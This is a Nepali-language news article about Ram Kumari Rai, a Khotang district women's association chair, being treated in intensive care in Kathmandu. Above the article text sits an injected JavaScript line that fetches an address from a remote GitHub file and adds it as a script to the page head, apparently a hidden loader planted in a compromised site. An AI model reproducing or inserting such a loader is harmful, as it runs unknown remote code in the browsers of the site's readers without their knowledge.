;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ | नेपाल महिला संघ खोटाङ जिल्लाकी सभापति राम कुमारी राइ अचानक बिरामी भएर काठमाडौँमा उपाचार गराई रहेको छन् | उनलाई ११ गते बिहान ७ बजे एम्बुलेन्समा ल्याएर हेल्पिंग ह्याण्ड हस्पिटलमा उपचार नभएर बाँसबारीको न्युरो हस्पिटलमा लागिएको थियो | अहिले उनि आइ सी यु मा उपचार गराई रहेको छन् |
दिक्तेल रुपाकोट मझुवागडी नगरपालिकामा जन्मेकी हुन् | विवाह नगरी बसेकी उनि ३० वर्ष देखि पार्टीको लागि निरन्तर काम गर्दै आएकी छन् | आफ्नो जिल्लाका महिलाहरुको मनमा बस्न सफल रहेकी उनि हरेक महिलाहरुको दुख सुखमा उभिने नेताको रुपमा राम्रो छाप बनाउदै आएकी छन् | उनि बिरामी भएकोमा खोटांग बासीले शिघ्र स्वास्थ्य लाभको कामना गरेका छन् |
फेसबुक प्रतिक्रियाहरु